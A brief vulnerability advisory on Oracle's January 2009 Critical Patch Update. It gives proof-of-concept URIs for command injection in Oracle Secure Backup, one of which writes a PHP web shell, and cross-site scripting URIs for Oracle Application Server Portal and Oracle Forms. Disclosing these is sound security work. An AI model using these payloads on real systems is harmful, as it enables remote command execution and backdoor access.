|
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
Some of these issues may not require specific exploit code and may be trivial to exploit. Core Security Technologies has developed working commercial exploits for its CORE IMPACT product for the issues documented by CVE-2008-5449 and CVE-2008-5457. These exploits are not otherwise publicly available or known to be circulating in the wild. The following proof-of-concept URIs are available for Oracle Secure Backup: 1. Create a file in the directory "c:\": https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+; 2. Create a PHP backdoor: https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo The following example URI is available for the Oracle Application Server portal: http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS PORTAL&search_type=XSS The following example URI is available for Oracle Forms: http://www.example.com/ifcgi60.exe?form=XSS The following exploits and proof of concept are available: |
|
|
Privacy Statement |
